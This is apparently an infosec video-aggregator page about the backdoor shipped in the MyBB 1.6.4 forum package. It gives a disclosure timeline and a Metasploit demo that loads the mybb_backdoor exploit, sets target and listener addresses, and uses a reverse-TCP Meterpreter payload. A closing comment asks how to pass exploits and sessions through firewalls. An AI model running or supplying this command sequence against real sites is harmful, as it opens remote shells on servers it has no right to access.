Description: Timeline :
Vulnerability discovered by the vendor the 2011-10-06
Public release of the vulnerability the 2011-10-06
Metasploit PoC provided the 2011-10-08
PoC provided by:
tdz
Reference(s) :
SA46300
Affected versions :
MyBB 1.6.4 prior to October 6th, 2011 are vulnerable.
Tested on Ubuntu 10.04.3 LTS with MyBB 1.6.4
Description :
myBB is a popular open source PHP forum software. Version 1.6.4 contained an unauthorized backdoor, distributed as part of the vendor's source package.
Metasploit demo :
use exploit/unix/webapp/mybb_backdoor
set RHOST 192.168.178.21
set VHOST blackbox.zataz.loc
set URI /mybb/index.php
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
getuid
sysinfo
Tags: backdoor , metasploit ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
please i know send exploit through firewall and meterpreter sessions through firewall